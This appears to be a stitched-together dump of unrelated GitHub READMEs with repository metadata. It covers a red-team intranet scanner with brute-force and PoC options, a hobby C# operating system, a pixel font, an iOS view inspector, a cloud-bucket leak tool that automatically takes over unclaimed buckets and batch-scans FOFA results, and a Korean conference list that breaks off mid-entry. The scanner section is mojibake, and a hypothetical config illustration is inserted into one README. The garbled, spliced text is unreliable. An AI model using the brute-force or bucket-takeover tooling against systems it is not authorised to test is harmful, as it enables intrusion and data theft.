- eๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐไธๆŽฅๆ”ถไปปไฝ•ๅ€ผ,ๆ‰“ๅฐๆœŸ้—ด็š„้”™่ฏฏๆ—ฅๅฟ—,็”จไบŽๆŽ’ๆŸฅๆ‰ซๆ็š„้—ฎ้ข˜. - iๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆŽฅๆ”ถไธ€ไธชๅญ—็ฌฆไธฒ,ๅญ—็ฌฆไธฒ็”จไบŽๅฃฐๆ˜Ž่ฆๆ‰ซๆ็š„็ฝ‘ๆฎต,ไพ‹ๅฆ‚192.168.11.11-255 or 192.168.1.1/24 or /22 /15... ,ๆญคๅ‚ๆ•ฐๆ”ฏๆŒCIDR็š„่กจ่พพๅผ. - itๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆœŸๆœ›ๆŽฅๆ”ถไธ€ไธชๆ•ฐๅ€ผ็ฑปๅž‹,็”จไบŽไฟกๆฏๆŽขๆต‹ๆจกๅ—ๅผ€ๅฏ็š„ๅ็จ‹ๆ•ฐ้‡,ไพ‹ๅฆ‚ipๅญ˜ๆดปใ€็ซฏๅฃๆ‰ซๆใ€webๆŒ‡็บน. - nobruteๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐไธๆŽฅๆ”ถไปปไฝ•ๅ€ผ,ไธๅฏนไฟกๆฏๆŽขๆต‹็š„็ป“ๆžœ่ฟ›่กŒๆšดๅŠ›็ ด่งฃๆจกๅ—. - nopingๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐไธๆŽฅๆ”ถไปปไฝ•ๅ€ผ,ๅœจ็›ฎๆ ‡็ฝ‘ๆฎตไธๆ”ฏๆŒICMPๅ่ฎฎๆ—ถ,้€š่ฟ‡TCP่ฟ›่กŒๆŽขๆต‹. - nopocๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐไธๆŽฅๆ”ถไปปไฝ•ๅ€ผ,ไธๅฏนๆŽขๆต‹็š„WEBๆœๅŠก่ฟ›่กŒๆผๆดžๆŽขๆต‹็š„ๆจกๅ—. - oๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆŽฅๆ”ถไธ€ไธชๅญ—็ฌฆไธฒ,็”จไบŽๅฏน็ป“ๆžœไฟๅญ˜็š„ๆ–‡ไปถๅ็งฐ,้ป˜่ฎคไธบoutput.txt. - onpingๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐไธๆŽฅๆ”ถไปปไฝ•ๅ€ผ,ๅฏน็›ฎๆ ‡็ฝ‘ๆฎตๅช่ฟ›่กŒICMP็š„ipๅญ˜ๆดปๆŽขๆต‹,ๅ…ถไฝ™ไธ€ๅพ‹ไธๅš. - pๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆŽฅๆ”ถไธ€ไธชๅญ—็ฌฆไธฒ,ๆŒ‡ๅฎš็ซฏๅฃๆ‰ซๆ็š„็ซฏๅฃ.ไพ‹ๅฆ‚,80,8088,1-3000 (ๆณจ:ๆญคๅ‚ๆ•ฐไธ€็ปๆŒ‡ๅฎšๅˆ™ไธ่ฟ›่กŒ็จ‹ๅบ่‡ชๅธฆ็ซฏๅฃ็š„ๆ‰ซๆ) - pwๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆŽฅๆ”ถไธ€ไธชๅญ—็ฌฆไธฒ,ๆŒ‡ๅฎš็ˆ†็ ด็š„ๅฏ†็ ๅญ—ๅ…ธ,ไพ‹ๅฆ‚ -pw ffnxjfl123,fgmgergn334 ๏ผˆๆณจ:ๆญคๅ‚ๆ•ฐไธ€็ปๆŒ‡ๅฎšๅˆ™ไธ่ฟ›่กŒ็จ‹ๅบ่‡ชๅธฆๅฏ†็ ็š„ๆ‰ซๆ) - tๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆœŸๆœ›ๆŽฅๆ”ถไธ€ไธชๆ•ฐๅ€ผ็ฑปๅž‹,็”จไบŽๅœจๆผๆดžๆ‰ซๆ,WEB่ฏ†ๅˆซๆ—ถ็š„่ถ…ๆ—ถๆ—ถ้—ด่ฎพ็ฝฎ. - usๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆœŸๆœ›ๆŽฅๆ”ถไธ€ไธชๅญ—็ฌฆไธฒ,ๆŒ‡ๅฎš็ˆ†็ ด็š„็”จๆˆทๅๅญ—ๅ…ธ,ไพ‹ๅฆ‚ -us fwefwf,fwefwf (ๆณจ:ๆญคๅ‚ๆ•ฐไธ€็ปๆŒ‡ๅฎšๅˆ™ไธ่ฟ›่กŒ็จ‹ๅบ่‡ชๅธฆ็”จๆˆทๅ็š„ๆ‰ซๆ) - ๅฆ‚ๆžœๆƒณๆŒ‡ๅฎš็ซฏๅฃใ€็ˆ†็ ด็š„็”จๆˆทๅๅ’Œๅฏ†็ ๅนถไธ”ไป็„ถไฝฟ็”จ็จ‹ๅบ่‡ชๅธฆ็š„็ซฏๅฃใ€ๅฏ†็ ใ€็”จๆˆทๅ่ฟ›่กŒๆ‰ซๆ.ๅฏไปฅๅœจๅฝ“ๅ‰็จ‹ๅบ็š„ๅŒ็บง็›ฎๅฝ•ไธŠไผ ๅไธบ"config.json"็š„ๆ–‡ไปถ > ๅ†…ๅฎนไธบ: {"pass":["ffnxjfl123","fgmgergn334"],"user":["fwefwf","fwefwf"],"ports":[9999,8888]} ## 0x04 ไฝฟ็”จๆˆชๅ›พ <img width="1000" alt="image" src="https://github.com/1n7erface/Template/assets/52184829/e14e0992-2931-4c57-a502-e3d029f41020"> <img width="1000" alt="image" src="https://github.com/1n7erface/Template/assets/52184829/42b66291-57dc-40fe-9f13-6dc75ed6fb48"> ## 0x05 ๅ†™ๅœจๆœ€ๅŽ > ๅฏนๅพ…ไธ€ไธชไบงๅ“ๆˆ–ๅทฅๅ…ท,ๆˆ‘ๅธŒๆœ›ๆณจๅ…ฅ่‡ชๅทฑ็™พๅˆ†็™พ็š„ๅฟƒ่ก€ไธŽไป˜ๅ‡บ,ๆˆ‘ๅฏไปฅไธ€็›ดๅŽป้‡ๆž„็›ดๅˆฐๆˆ‘่ฎคไธบ็š„ๆปกๆ„,่ฟ™ๅคงๆฆ‚ๆ˜ฏไธ€ไธชๆŠ€ๆœฏไบบ็š„ๆ‰ง็€. > > ไธๆœ‰่ถฃ,ๆฏ‹ๅฎๆญป.
Next generation RedTeam heuristic intranet scanning | ไธ‹ไธ€ไปฃRedTeamๅฏๅ‘ๅผๅ†…็ฝ‘ๆ‰ซๆ
scanner,security-tools,poc
21
1
0
43
5
1
0
nifanfa/MOOS
[![Language switcher](https://img.shields.io/badge/Language%20%2F%20%E8%AF%AD%E8%A8%80-English%20%2F%20%E8%8B%B1%E8%AF%AD-blue)](https://github.com/nifanfa/MOOS/blob/main/README_CN.md) <p align="center"> <img width=300 src="MOOS-Logo.svg"/> </p> <p align="center"> <a href="https://github.com/nifanfa/moos/issues"><img alt="GitHub issues" src="https://img.shields.io/github/issues/nifanfa/moos"></a> <a href="https://github.com/nifanfa/moos/network"><img alt="GitHub forks" src="https://img.shields.io/github/forks/nifanfa/moos"></a> <a href="https://github.com/nifanfa/moos/stargazers"><img alt="GitHub stars" src="https://img.shields.io/github/stars/nifanfa/moos"></a> <a href="https://github.com/nifanfa/moos"><img alt="GitHub license" src="https://img.shields.io/github/license/nifanfa/moos"></a> <a href="https://github.com/nifanfa/MOOS/blob/main/LICENSE"><img alt="GitHub license" src="https://img.shields.io/github/license/nifanfa/moos"></a> <a href="https://discord.gg/uJstXbx8Pt"><img src="https://discordapp.com/api/guilds/987075686256762890/widget.png?style=shield" alt="Discord Shield"/></a> </p> # MOOS MOOS (**M**y **O**wn **O**perating **S**ystem Project) is a C# x64 operating system built with the .NET 7 Native AOT technology. ## Building For information on compiling MOOS, please read the [build wiki page](https://github.com/nifanfa/MOOS/wiki/How-do-you-build-or-compile-MOOS%3F). ### Build requirements - VMware Workstation Player - https://www.vmware.com/products/workstation-player.html - Visual Studio 2022 - https://visualstudio.microsoft.com/ - QEMU - https://www.qemu.org/download or VMware (note: USB does not work with VMware, and an x64 host is required to run VMware; 32-bit is not supported) - Windows 10-11 x64 or x86 - A CPU from 2012 or newer - in basic terms, an Ivy Bridge CPU or later - 4GB of RAM, but 8GB is recommended <br/> <hr/> <br/> ![image](Screenshot3.png) ## Features | Feature | Working in VM | Working on hardware | Information | | ------- | ------------- | ------------------- | ----------- | | Applications .mue (MOOS User Executable) | 🟩 | 🟩 | | Error Throwing / Catching | 🟥 | 🟥 | | GC | 🟨 | ⬜ | Not safe | | Multiprocessor | 🟩 | 🟩 | | Multithreading | 🟩 | 🟩 | | EHCI(USB2.0) | 🟩 | 🟩 | | USB Keyboard | 🟨 | ⬜ | | USB Mouse | 🟩 | ⬜ | | USB HUB | 🟥 | 🟥 | | PS2 Keyboard/Mouse(USB Compatible) | 🟩 | 🟩 | | Nintendo Family Computer Emulator | 🟩 | 🟩 | | DOOM(doomgeneric) | 🟩 | 🟩 | | Intel® Gigabit Ethernet Network | 🟩 | 🟩 | | Realtek RTL8111E | 🟩 | 🟩 | | ExFAT | 🟩 | ⬜ | | I/O APIC | 🟩 | 🟩 | | Local APIC | 🟩 | 🟩 | | SATA | 🟩 | ⬜ | | IDE | 🟩 | 🟩 | | SMBIOS | 🟩 | 🟩 | | ACPI | 🟩 | 🟩 | | IPv4 | 🟩 | 🟩 | | IPv6 | 🟥 | 🟥 | | TCP | 🟩 | 🟩 | | UDP | 🟩 | 🟩 | | DNS | 🟩 | 🟩 | | DHCP | 🟩 | 🟩 | | Lan | 🟩 | 🟩 | | Wan | 🟩 | 🟩 | | Color Key | Meaning | | ----- | ------- | | 🟩 | Yes | | 🟥 | No | | 🟨 | W.I.P / Partially / Buggy | | ⬜ | Unknown | ## Contact me Email: nifanfa@foxmail.com (I hardly use it, so it may take a few months before I see your message) QQ: 3244735564 QQ group: 686383293 Discord: https://discord.gg/uJstXbx8Pt
C# x64 operating system programming with the .NET native ahead-of-time compilation technology.
csharp,operating-system,nativeaot,corert,hobby-os,os,multithreading,smp
1
9
39
1,336
13
1
0
TakWolf/fusion-pixel-font
![banner](docs/logo@2x.png) # 缝合像素字体 / Fusion Pixel Font [![License OFL](https://img.shields.io/badge/license-OFL--1.1-orange)](https://openfontlicense.org) [![License MIT](https://img.shields.io/badge/license-MIT-green)](https://opensource.org/licenses/MIT) [![Releases](https://img.shields.io/github/v/release/TakWolf/fusion-pixel-font)](https://github.com/TakWolf/fusion-pixel-font/releases) [![Discord](https://img.shields.io/badge/discord-像素字体工坊-4E5AF0?logo=discord&logoColor=white)](https://discord.gg/3GKtPKtjdU) [![QQ Group](https://img.shields.io/badge/QQ群-像素字体工坊-brightgreen?logo=tencentqq&logoColor=white)](https://qm.qq.com/q/X1mLrLLGYS) An open-source pan-CJK pixel font in a gothic (sans-serif) style, supporting 8, 10 and 12 pixel sizes. This project is a temporary, transitional solution for the ["Ark Pixel Font"](https://github.com/TakWolf/ark-pixel-font). It is merged from several pixel fonts, hence the name "Fusion". The logo pays homage to the ["Polymerization"](https://www.db.yugioh-card.com/yugiohdb/card_search.action?ope=2&cid=4837&request_locale=ja) magic card artwork from [Yu-Gi-Oh!](https://zh.wikipedia.org/wiki/%E9%81%8A%E6%88%B2%E7%8E%8B). The project provides the complete toolchain needed to extract glyph bitmaps, merge glyphs and build the fonts. ## Preview You can preview the fonts in real time in the [Playground](https://fusion-pixel-font.takwolf.com/playground.html). ### 8 px [Sample text](https://fusion-pixel-font.takwolf.com/demo-8px.html) · [Monospaced alphabet](https://fusion-pixel-font.takwolf.com/alphabet-8px-monospaced.html) · [Proportional alphabet](https://fusion-pixel-font.takwolf.com/alphabet-8px-proportional.html) ![preview-8px](docs/preview-8px.png) ### 10 px [Sample text](https://fusion-pixel-font.takwolf.com/demo-10px.html) · [Monospaced alphabet](https://fusion-pixel-font.takwolf.com/alphabet-10px-monospaced.html) · [Proportional alphabet](https://fusion-pixel-font.takwolf.com/alphabet-10px-proportional.html) ![preview-10px](docs/preview-10px.png) ### 12 px [Sample text](https://fusion-pixel-font.takwolf.com/demo-12px.html) · [Monospaced alphabet](https://fusion-pixel-font.takwolf.com/alphabet-12px-monospaced.html) · [Proportional alphabet](https://fusion-pixel-font.takwolf.com/alphabet-12px-proportional.html) ![preview-12px](docs/preview-12px.png) ## Character statistics The links below show the characters currently supported by each font size. | Size | Monospaced | Proportional | |---|---|---| | 8px | [font-info-8px-monospaced](docs/font-info-8px-monospaced.md) | [font-info-8px-proportional](docs/font-info-8px-proportional.md) | | 10px | [font-info-10px-monospaced](docs/font-info-10px-monospaced.md) | [font-info-10px-proportional](docs/font-info-10px-proportional.md) | | 12px | [font-info-12px-monospaced](docs/font-info-12px-monospaced.md) | [font-info-12px-proportional](docs/font-info-12px-proportional.md) | ## Language-specific glyphs The following language-specific glyph versions are currently supported: | Version | Meaning | |---|---| | latin | Latin | | zh_hans | Chinese (Simplified) | | zh_hant | Chinese (Traditional) | | ja | Japanese | | ko | Korean | Nevertheless, this project is still a patch-based font solution; you should not hold special expectations for the language-specific glyphs. ## Download The latest version can be downloaded via: - [GitHub Releases](https://github.com/TakWolf/fusion-pixel-font/releases) Five single-font formats are currently provided - `.otf`, `.ttf`, `.woff2`, `.bdf`, `.pcf` - plus two collection formats, `.otc` and `.ttc`. ## License Licensing is split into two parts: the fonts and the build program. ### Fonts Licensed under the [SIL Open Font License 1.1](LICENSE-OFL), with the reserved font name "缝合像素 / Fusion Pixel". Third-party glyph source licenses are as follows: | Font | License | Notes | |---|---|---| | [方舟像素字体 / Ark Pixel Font](https://github.com/TakWolf/ark-pixel-font) | [OFL-1.1](https://github.com/TakWolf/ark-pixel-font/blob/develop/LICENSE-OFL) | Provides the 10 and 12 px base glyphs and parameters | | [美咲フォント / Misaki](https://littlelimit.net/misaki.htm) | [Untyped license](assets/fonts/misaki/LICENSE.txt), compatible with OFL-1.1 | Provides 8 px Japanese kanji glyphs | | [美績点陣體 / MisekiBitmap](https://github.com/ItMarki/MisekiBitmap) | [OFL-1.1](https://github.com/ItMarki/MisekiBitmap/blob/main/LICENSE) | Provides 8 px Simplified Chinese glyphs | | [精品點陣體7×7 / BoutiqueBitmap7x7](https://github.com/scott0107000/BoutiqueBitmap7x7) | [OFL-1.1](https://github.com/scott0107000/BoutiqueBitmap7x7/blob/main/OFL.txt) | Provides 8 px Traditional Chinese glyphs | | [精品點陣體9×9 / BoutiqueBitmap9x9](https://github.com/scott0107000/BoutiqueBitmap9x9) | [OFL-1.1](https://github.com/scott0107000/BoutiqueBitmap9x9/blob/main/OFL.txt) | Provides 10 px Traditional Chinese supplements | | [俐方體11號／Cubic 11](https://github.com/ACh-K/Cubic-11) | [OFL-1.1](https://github.com/ACh-K/Cubic-11/blob/main/OFL.txt) | Provides 12 px Traditional Chinese supplements | | [Galmuri](https://github.com/quiple/galmuri) | [OFL-1.1](https://github.com/quiple/galmuri/blob/main/ofl.md) | Provides 8, 10 and 12 px Korean glyphs | ### Build program Licensed under the [MIT License](LICENSE-MIT). ## Official communities - ["Pixel Font Workshop" Discord server](https://discord.gg/3GKtPKtjdU) - ["Pixel Font Workshop" QQ group (302383204)](https://qm.qq.com/q/X1mLrLLGYS) ## Program dependencies - [Pixel Font Builder](https://github.com/TakWolf/pixel-font-builder) - [FontTools](https://github.com/fonttools/fonttools) - [Unidata Blocks](https://github.com/TakWolf/unidata-blocks) - [Character Encoding Utils](https://github.com/TakWolf/character-encoding-utils) - [PyYAML](https://github.com/yaml/pyyaml) - [PyPNG](https://gitlab.com/drj11/pypng) - [Pillow](https://github.com/python-pillow/Pillow) - [Beautiful Soup](https://www.crummy.com/software/BeautifulSoup/) - [Jinja](https://github.com/pallets/jinja) - [GitPython](https://github.com/gitpython-developers/GitPython) - [HTTPX](https://github.com/encode/httpx) ## Sponsorship If this project helps you, please consider sponsoring to support development. [![赞赏码](https://raw.githubusercontent.com/TakWolf/TakWolf/master/images/badge-payqr@2x.png)](https://github.com/TakWolf/TakWolf/blob/master/payment-qr-codes.md) [![爱发电](https://raw.githubusercontent.com/TakWolf/TakWolf/master/images/badge-afdian@2x.png)](https://afdian.net/@takwolf) Details of received sponsorships can be viewed via: [Sponsorship details](https://github.com/TakWolf/TakWolf/blob/master/sponsors.md)
ๅผ€ๆบๅƒ็ด ๅญ—ไฝ“ใ€‚ๆ”ฏๆŒ 8ใ€10 ๅ’Œ 12 ๅƒ็ด ใ€‚
font,fonts,pixel,cjk,game
18
1
0
456
9
2
1
hughkli/Lookin
![Preview](https://cdn.lookin.work/public/style/images/independent/homepage/preview_en_1x.jpg "Preview") # Introduction You can inspect and modify views in an iOS app via Lookin, just like the UI Inspector in Xcode, or another app called Reveal. Official Website：https://lookin.work/ # Integration Guide To use the Lookin macOS app, you need to integrate LookinServer (the iOS framework of Lookin) into your iOS project. > **Warning** Never integrate LookinServer in the Release build configuration. ## via CocoaPods: ### Swift Project `pod 'LookinServer', :subspecs => ['Swift'], :configurations => ['Debug']` ### Objective-C Project `pod 'LookinServer', :configurations => ['Debug']` ## via Swift Package Manager: `https://github.com/QMUI/LookinServer/` # Repository LookinServer: https://github.com/QMUI/LookinServer macOS app: https://github.com/hughkli/Lookin/ # Tips - How to display custom information in Lookin: https://bytedance.larkoffice.com/docx/TRridRXeUoErMTxs94bcnGchnlb - How to display more member variables in Lookin: https://bytedance.larkoffice.com/docx/CKRndHqdeoub11xSqUZcMlFhnWe - How to turn on Swift optimization for Lookin: https://bytedance.larkoffice.com/docx/GFRLdzpeKoakeyxvwgCcZ5XdnTb - Documentation Collection: https://bytedance.larkoffice.com/docx/Yvv1d57XQoe5l0xZ0ZRc0ILfnWb # Acknowledgements https://qxh1ndiez2w.feishu.cn/docx/YIFjdE4gIolp3hxn1tGckiBxnWf --- # 简介 Lookin 可以查看与修改 iOS App 里的 UI 对象，类似于 Xcode 自带的 UI Inspector 工具，或另一款叫做 Reveal 的软件。 官网：https://lookin.work/ # 安装 LookinServer Framework 如果这是你的 iOS 项目第一次使用 Lookin，则需要先把 LookinServer 这款 iOS Framework 集成到你的 iOS 项目中。 > **Warning** 记得不要在 AppStore 模式下集成 LookinServer。 ## 通过 CocoaPods： ### Swift 项目 `pod 'LookinServer', :subspecs => ['Swift'], :configurations => ['Debug']` ### Objective-C 项目 `pod 'LookinServer', :configurations => ['Debug']` ## 通过 Swift Package Manager: `https://github.com/QMUI/LookinServer/` # 源代码仓库 iOS 端 LookinServer：https://github.com/QMUI/LookinServer macOS 端软件：https://github.com/hughkli/Lookin/ # 技巧 - 如何在 Lookin 中展示自定义信息: https://bytedance.larkoffice.com/docx/TRridRXeUoErMTxs94bcnGchnlb - 如何在 Lookin 中展示更多成员变量: https://bytedance.larkoffice.com/docx/CKRndHqdeoub11xSqUZcMlFhnWe - 如何为 Lookin 开启 Swift 优化: https://bytedance.larkoffice.com/docx/GFRLdzpeKoakeyxvwgCcZ5XdnTb - 文档汇总：https://bytedance.larkoffice.com/docx/Yvv1d57XQoe5l0xZ0ZRc0ILfnWb # 鸣谢 https://qxh1ndiez2w.feishu.cn/docx/YIFjdE4gIolp3hxn1tGckiBxnWf
Free macOS app for iOS view debugging.
null
6
4
6
195
3
12
0
UzJu/Cloud-Bucket-Leak-Detection-Tools
![image-20220703203021188](images/image-20220703203021188.png) # :rooster:Usage Guide ```bash git clone https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git cd Cloud-Bucket-Leak-Detection-Tools/ # Install dependencies; Python 3.8+ is recommended. My version: Python 3.9.13 (main, May 24 2022, 21:28:31) # Tested versions: # 1. python3.8.9 # 2. python3.9.13 # 3. python3.7 # 4. python3.6.15 # 5. python3.9.6 pip3 install -r requirements.txt python3 main.py -h ``` ![image-20220716140707903](images/image-20220716140707903.png) Before use, configure your own cloud-vendor access keys (AK) in the `config/conf.py` file; a hypothetical illustration of this file follows at the end of this README. ![image-20220716140934866](images/image-20220716140934866.png) ## 1. Alibaba Cloud buckets ### 1.1 Single-bucket scan ```bash python3 main.py -aliyun [bucket URL] ``` ![image-20220716141132931](images/image-20220716141132931.png) ### 1.2 Automatic bucket takeover If a scanned bucket does not exist, the tool automatically takes that bucket over. ![image-20220703202339058](images/image-20220703202339058.png) ### 1.3 Batch bucket scanning ```bash # fofa syntax domain="aliyuncs.com" server="AliyunOSS"domain="aliyuncs.com" ``` ```bash # use -faliyun python3 main.py -faliyun url.txt ``` ![image-20220716141356518](images/image-20220716141356518.png) ## 2. Tencent Cloud buckets ```bash python3 main.py -tcloud [bucket URL] ``` ![image-20220716141554856](images/image-20220716141554856.png) ## 3. Huawei Cloud buckets ```bash python3 main.py -hcloud [bucket URL] ``` ![image-20220716141948046](images/image-20220716141948046.png) ## 4. AWS buckets ```bash python3 main.py -aws [bucket URL] ``` ![image-20220716142431142](images/image-20220716142431142.png) ## 5. Saving scan results Scan results are stored in the `results` directory ![image-20220716142617997](images/image-20220716142617997.png) ![image-20220716142641883](images/image-20220716142641883.png) # :cop:0xFFFFFFFF Disclaimer 1. This tool is for academic exchange only; using it for anything illegal is prohibited. 2. It was written just for fun. 3. My WeChat > If you have better suggestions, or just want to make a friend <img src="images/157070417-dbb7886f-1bb8-412f-a30b-0f85bc8ffa10.png" alt="image" style="zoom:33%;" /> 4. Blog: UzzJu.com 5. WeChat official account ![image-20220716143619529](images/image-20220716143619529.png) ## 404StarLink Project ![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png) **Cloud-Bucket-Leak-Detection-Tools** has now joined the [404StarLink Project](https://github.com/knownsec/404StarLink) # Star history [![Stargazers over time](images/Cloud-Bucket-Leak-Detection-Tools.svg)](https://starchart.cc/UzJu/Cloud-Bucket-Leak-Detection-Tools)
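The README does not show what `config/conf.py` looks like, so the following is a purely hypothetical illustration of the kind of access-key settings it holds. The variable names are invented for illustration only; check the actual `config/conf.py` shipped with the repository for the real ones.

```python
# HYPOTHETICAL illustration of config/conf.py contents - the real variable
# names are defined by the project; consult the shipped config/conf.py.
# Never commit real access keys to version control.
ALIYUN_ACCESS_KEY_ID = "<your-aliyun-ak-id>"          # placeholder value
ALIYUN_ACCESS_KEY_SECRET = "<your-aliyun-ak-secret>"  # placeholder value
TENCENT_SECRET_ID = "<your-tencent-secret-id>"        # placeholder value
TENCENT_SECRET_KEY = "<your-tencent-secret-key>"      # placeholder value
```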
ๅ…ญๅคงไบ‘ๅญ˜ๅ‚จ๏ผŒๆณ„้œฒๅˆฉ็”จๆฃ€ๆต‹ๅทฅๅ…ท
null
3
1
2
42
8
1
0
hibuz/dev-conf-replay
[![RSS](https://img.shields.io/badge/rss-F88900?logo=rss&logoColor=white)](https://github.com/hibuz/dev-conf-replay/commits/main.atom) [![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fhibuz/dev-conf-replay%2Fhit-counter&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com) [![Links](https://github.com/hibuz/dev-conf-replay/actions/workflows/check_links.yml/badge.svg)](https://github.com/hibuz/dev-conf-replay/actions/workflows/check_links.yml) # ๊ตญ๋‚ด IT ์„ธ๋ฏธ๋‚˜ ๋ฐ ๊ฐœ๋ฐœ์ž ์ปจํผ๋Ÿฐ์Šค (๋‹ค์‹œ๋ณด๊ธฐ) ๐Ÿ˜Ž โœจ ์‹ ๊ทœ์˜์ƒ - `2024.06.03` [`IT๊ธฐ์—…`](#it๊ธฐ์—…) > 6์›” ์šฐ์•„ํ•œํ…Œํฌ์„ธ๋ฏธ๋‚˜ > [๊ธ€๋กœ๋ฒŒ ๊ฐœ๋ฐœ์ž๋กœ ์„ฑ์žฅํ•˜๋Š” ๋ฒ•](https://youtu.be/Nb2RnQzxu4I?list=PLgXGHBqgT2TtGi82mCZWuhMu-nQy301ew) - `2024.05.29` [`์ปค๋ฎค๋‹ˆํ‹ฐ`](#์ปค๋ฎค๋‹ˆํ‹ฐ) > AWSKRUG ํ”„๋ก ํŠธ์—”๋“œ ์†Œ๋ชจ์ž„ > [Next.js์™€ AWS ECS, CI/CD ๊ทธ๋ฆฌ๊ณ  CDN์„ ๊ณ๋“ค์ธ](https://youtu.be/dCZKSMO_ebg?list=PLX2fs3661XpNfRSZ9TD_xyQdegvtNDsdw) - `2024.05.28` [`์ธ๊ณต์ง€๋Šฅ`](#์ธ๊ณต์ง€๋Šฅ) > ๋ชจ๋‘ํŒ > [์˜จ๋””๋ฐ”์ด์Šค AI ๋ฐ ๋กœ์ปฌ AI์˜ ๋„์ „ ๊ณผ์ œ](https://youtu.be/mlebHixCgXQ?list=PLv6H9ngYdJbKcGl2VrVBr8YAClPcVrrim) โšก ๋ฐ”๋กœ๊ฐ€๊ธฐ > [`IT๊ธฐ์—…`](#it๊ธฐ์—…) [`์ธ๊ณต์ง€๋Šฅ`](#์ธ๊ณต์ง€๋Šฅ) [`๋น…๋ฐ์ดํ„ฐ`](#๋น…๋ฐ์ดํ„ฐ) [`ํด๋ผ์šฐ๋“œ`](#ํด๋ผ์šฐ๋“œ) [`์ธํ”„๋ผ & ๋ฐ๋ธŒ์˜ต์Šค`](#์ธํ”„๋ผ--๋ฐ๋ธŒ์˜ต์Šค) [`๋ธ”๋ก์ฒด์ธ`](#๋ธ”๋ก์ฒด์ธ) [`๋ชจ๋นŒ๋ฆฌํ‹ฐ`](#๋ชจ๋นŒ๋ฆฌํ‹ฐ) [`๊ฒŒ์ž„`](#๊ฒŒ์ž„) [`๋ณด์•ˆ`](#๋ณด์•ˆ) [`๋ชจ๋ฐ”์ผ`](#๋ชจ๋ฐ”์ผ) [`ํ”„๋ก ํŠธ์—”๋“œ & JS`](#ํ”„๋ก ํŠธ์—”๋“œ--js) [`ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ธ์–ด`](#ํ”„๋กœ๊ทธ๋ž˜๋ฐ-์–ธ์–ด) [`์˜คํ”ˆ์†Œ์Šค`](#์˜คํ”ˆ์†Œ์Šค) [`๊ต์œก`](#๊ต์œก) [`์ปค๋ฎค๋‹ˆํ‹ฐ`](#์ปค๋ฎค๋‹ˆํ‹ฐ) [`๊ธฐํƒ€`](#๊ธฐํƒ€) ## ๊ฐœ๋ฐœ๊ด€๋ จ ์œ ํŠœ๋ธŒ ์ฑ„๋„ - updated at `2024.05.06` 1. `59.7๋งŒ` ์กฐ์ฝ”๋”ฉ JoCoding > https://www.youtube.com/@jocoding 2. `49.4๋งŒ` ๋…ธ๋งˆ๋“œ ์ฝ”๋” Nomad Coders > https://www.youtube.com/@nomadcoders 3. `34.6๋งŒ` ์ƒํ™œ์ฝ”๋”ฉ > https://www.youtube.com/@coohde 4. `34.1๋งŒ` ๋‚˜๋„์ฝ”๋”ฉ > https://www.youtube.com/@nadocoding 5. `26.8๋งŒ` ์ฝ”๋”ฉ์• ํ”Œ > https://www.youtube.com/@codingapple 6. `17.2๋งŒ` ๋“œ๋ฆผ์ฝ”๋”ฉ > https://www.youtube.com/@dream-coding 7. `17.0๋งŒ` ๋™๋นˆ๋‚˜ > https://www.youtube.com/@dongbinna 8. `16.3๋งŒ` ์ฝ”๋”ฉํ•˜๋Š”๊ฑฐ๋‹ˆ > https://www.youtube.com/@gunnycoding 9. `14.6๋งŒ` ์›Œ๋‹ˆ์ฝ”๋”ฉ > https://www.youtube.com/@WonieSong 10. 
`11.1๋งŒ` ๊ฐœ๋ฐœ์ž ๋ผ๋ผ > https://www.youtube.com/@devlala ## IT๊ธฐ์—… - ๋„ค์ด๋ฒ„ - [DEVIEW](https://deview.kr) - [2020](https://tv.naver.com/v/16968202/list/657024) | [2021](https://tv.naver.com/v/23700321/list/753227) | [2023](https://www.youtube.com/playlist?list=PLsFtzQAC8dDcQAcSG4PNrW7-0ExDZqqJA) - 2023.02.27~28 - TECH CONCERT - [2020](https://tv.naver.com/v/15353556/list/629240) - 2020.08.19~20 - [NAVER Search Colloquium](https://searchcolloquium.naver.com) - [2021](https://tv.naver.com/v/20307278/list/709884) | [2022](https://tv.naver.com/v/26581332/list/785512) - 2022.05.03 - [NAVER ENGINEERING DAY 2023](https://www.youtube.com/playlist?list=PLsFtzQAC8dDfk-KmvmagozbYtQ2Fmpmpi) - 2023.07.31 - ์นด์นด์˜ค - [if(kakao)](https://if.kakao.com) - [2020](https://elseif.kakao.com/2020) | [2021](https://elseif.kakao.com/2021) | [2022](https://if.kakao.com/session?t.bab36uRci8=0) - 2022.12.07~09 - [kakao tech meet](https://tech.kakao.com/) - [์ œ1ํšŒ](https://www.youtube.com/playlist?list=PLwe9WEhzDhwF36thY2_SVoayAz_KRWv_f), [์ œ2ํšŒ](https://www.youtube.com/playlist?list=PLwe9WEhzDhwFk-bT7qYW0w8TPddhsQU0u), [์ œ3ํšŒ](https://www.youtube.com/playlist?list=PLwe9WEhzDhwHzbY2_YFUZs0qjGo3CnnDf), [์ œ4ํšŒ](https://www.youtube.com/playlist?list=PLwe9WEhzDhwHa1EDC2e2-XCpIrgHMsvtn), [์ œ5ํšŒ](https://www.youtube.com/playlist?list=PLwe9WEhzDhwEIEMal76jXu70_L8ad-k-Y) - 2024.06.13 - ๋ผ์ธ - LINE [DEVELOPER DAY](https://linedevday.linecorp.com) - 